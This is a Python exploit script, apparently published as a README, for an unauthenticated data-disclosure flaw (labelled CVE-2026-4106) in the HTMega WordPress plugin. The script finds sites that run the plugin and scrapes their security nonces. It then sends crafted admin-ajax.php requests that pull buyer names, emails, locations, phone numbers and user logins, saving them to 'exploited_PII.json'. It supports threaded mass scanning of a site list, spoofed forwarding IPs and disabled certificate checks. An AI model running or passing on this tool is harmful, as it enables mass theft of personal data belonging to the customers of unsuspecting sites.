README.md
Rendering markdown...
import requests
import re
import json
import random
import time
import urllib3
import os
import ssl
import sys
import ctypes
import signal
import threading
import html
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor, as_completed
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
os.system('')
RED = '\033[91m'
GREEN = '\033[92m'
CYAN = '\033[96m'
RESET = '\033[0m'
IS_RUNNING = True
counter_lock = threading.Lock()
file_lock = threading.Lock()
def signal_handler(sig, frame):
global IS_RUNNING
IS_RUNNING = False
print(f"\n{RED}[!] Keyboard interrupt received. Exiting immediately...{RESET}")
os._exit(1)
signal.signal(signal.SIGINT, signal_handler)
class SSLAdapter(requests.adapters.HTTPAdapter):
def init_poolmanager(self, *args, **kwargs):
context = ssl.create_default_context()
context.set_ciphers('DEFAULT@SECLEVEL=1')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
kwargs['ssl_context'] = context
return super(SSLAdapter, self).init_poolmanager(*args, **kwargs)
class HTMegaPoC:
def __init__(self, thread_count=40):
self.json_file = "exploited_PII.json"
self.summary_file = "exploited_summary.txt"
self.thread_count = thread_count
self.processed_count = 0
self.total_sites = 0
self.session = requests.Session()
adapter = SSLAdapter()
self.session.mount("https://", adapter)
self.session.mount("http://", adapter)
self.agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"
]
def set_title(self, title):
if sys.platform == "win32":
ctypes.windll.kernel32.SetConsoleTitleW(title)
def get_headers(self, target):
fake_ip = ".".join(map(str, (random.randint(1, 254) for _ in range(4))))
return {
'User-Agent': random.choice(self.agents),
'X-Requested-With': 'XMLHttpRequest',
'Referer': target + '/',
'X-Forwarded-For': fake_ip,
'Accept': 'application/json, text/javascript, */*; q=0.01'
}
def scan_target(self, target):
global IS_RUNNING
if not IS_RUNNING: return
target = target.strip()
if not target: return
if not target.startswith('http'): target = 'https://' + target
try:
r_main = self.session.get(target, headers=self.get_headers(target), timeout=10, verify=False)
with counter_lock:
self.processed_count += 1
current_idx = self.processed_count
self.set_title(f"CVE-2026-4106 | Scanning: {current_idx}/{self.total_sites}")
print(f"[*] [{current_idx}/{self.total_sites}] Checking: {target}")
if '/wp-content/' not in r_main.text.lower() or 'htmega' not in r_main.text.lower():
return
nonces = list(set(re.findall(r'security\s*[:=]\s*[\'"]([a-f0-9]{10})[\'"]', r_main.text)))
ajax_url = urljoin(target, '/wp-admin/admin-ajax.php')
actions = [
"wcsales_purchased_products",
"htmega_wc_sales_notification_data_load",
"htmega_user_list_ajax",
"htmega_contact_form_data_load",
"htmega_team_member_ajax",
"htmega_get_recent_orders_ajax",
"htmega_post_grid_ajax",
"htmega_portfolio_ajax",
"htmega_search_results",
"htmega_instagram_feed",
"htmega_twitter_feed"
]
for action in actions:
if not IS_RUNNING: break
payloads = [{'action': action, 'limit': '1000'}]
for n in nonces:
payloads.append({'action': action, 'security': n, 'limit': '1000'})
payloads.append({'action': action, 'nonce': n, 'limit': '1000'})
for data in payloads:
if not IS_RUNNING: break
r = self.session.post(ajax_url, data=data, headers=self.get_headers(target), timeout=12, verify=False)
res_body = r.text.strip()
if res_body.lower().startswith('<html') or '<!doctype' in res_body.lower():
continue
if r.status_code == 200 and res_body not in ["0", "-1", ""]:
try:
json_data = r.json()
if any(k in str(json_data).lower() for k in ['fname', 'lname', 'email', 'buyer', 'city', 'phone', 'price', 'user_login', 'message']):
self.save_data(target, action, data.get('security', 'None'), json_data)
print(f"[{GREEN}+{RESET}] {RED}VULNERABLE:{RESET} {target} | Action: {CYAN}{action}{RESET}")
return
except:
if any(k in res_body.lower() for k in ['fname', 'email', 'billing', 'city', 'user_login']):
self.save_data(target, action, data.get('security', 'None'), res_body)
print(f"[{GREEN}+{RESET}] {RED}VULNERABLE:{RESET} {target} | Action: {CYAN}{action}{RESET}")
return
except:
pass
def save_data(self, url, action, nonce, data):
with file_lock:
ts = time.strftime("%Y-%m-%d %H:%M:%S")
json_entry = {"url": url, "action": action, "nonce": nonce, "date": ts, "data": data}
try:
db = []
if os.path.exists(self.json_file):
with open(self.json_file, "r", encoding="utf-8") as f: db = json.load(f)
db.append(json_entry)
with open(self.json_file, "w", encoding="utf-8") as f: json.dump(db, f, indent=4, ensure_ascii=False)
except: pass
try:
with open(self.summary_file, "a", encoding="utf-8") as f:
f.write(f"[+] Target: {url} | Action: {action} | Date: {ts}\n")
if isinstance(data, list) and len(data) > 0:
for item in data[:30]:
b = item.get('buyer', {})
name = f"{b.get('fname','')} {b.get('lname','')}".strip() or item.get('display_name', 'UNKNOWN')
loc = f"{b.get('city','Unknown')}/{b.get('country','Unknown')}"
prod_name = item.get('name', item.get('post_title', 'N/A'))
price_raw = str(item.get('price', 'N/A'))
price = html.unescape(price_raw)
prod_url = item.get('url', 'N/A')
f.write(f" -> Buyer: {name} | Location: {loc} | Item: {prod_name} | Price: {price} | URL: {prod_url}\n")
else:
f.write(f" -> [RAW DATA] {str(data)[:200]}...\n")
f.write("\n")
except: pass
def run(self, sites):
self.total_sites = len(sites)
print(f"[*] Starting scan on {self.total_sites} targets using {self.thread_count} threads...")
with ThreadPoolExecutor(max_workers=self.thread_count) as executor:
try:
futures = [executor.submit(self.scan_target, site) for site in sites]
for future in as_completed(futures):
if not IS_RUNNING:
break
except KeyboardInterrupt:
os._exit(1)
if __name__ == "__main__":
print(f"""{CYAN}
===============================================================
[+] Exploit : CVE-2026-4106
[+] Title : HTMega Unauthenticated PII Disclosure Exploit
[+] Author : EFETR
==============================================================={RESET}
""")
print("[1] Single Target\n[2] Mass Scan (sites.txt)")
choice = input(f"[{GREEN}?{RESET}] Select mode: ")
if choice == "1":
target_url = input(f"[{GREEN}?{RESET}] URL: ")
scanner = HTMegaPoC(thread_count=1)
scanner.run([target_url])
elif choice == "2":
threads_input = input(f"[{GREEN}?{RESET}] Threads (default 40): ")
threads = int(threads_input) if threads_input.strip() else 40
scanner = HTMegaPoC(thread_count=threads)
if os.path.exists("sites.txt"):
with open("sites.txt", "r") as f:
site_list = [line.strip() for line in f.readlines() if line.strip()]
scanner.run(site_list)
else:
print(f"{RED}[-] Error: sites.txt not found in current directory.{RESET}")
else:
print(f"{RED}[-] Invalid choice.{RESET}")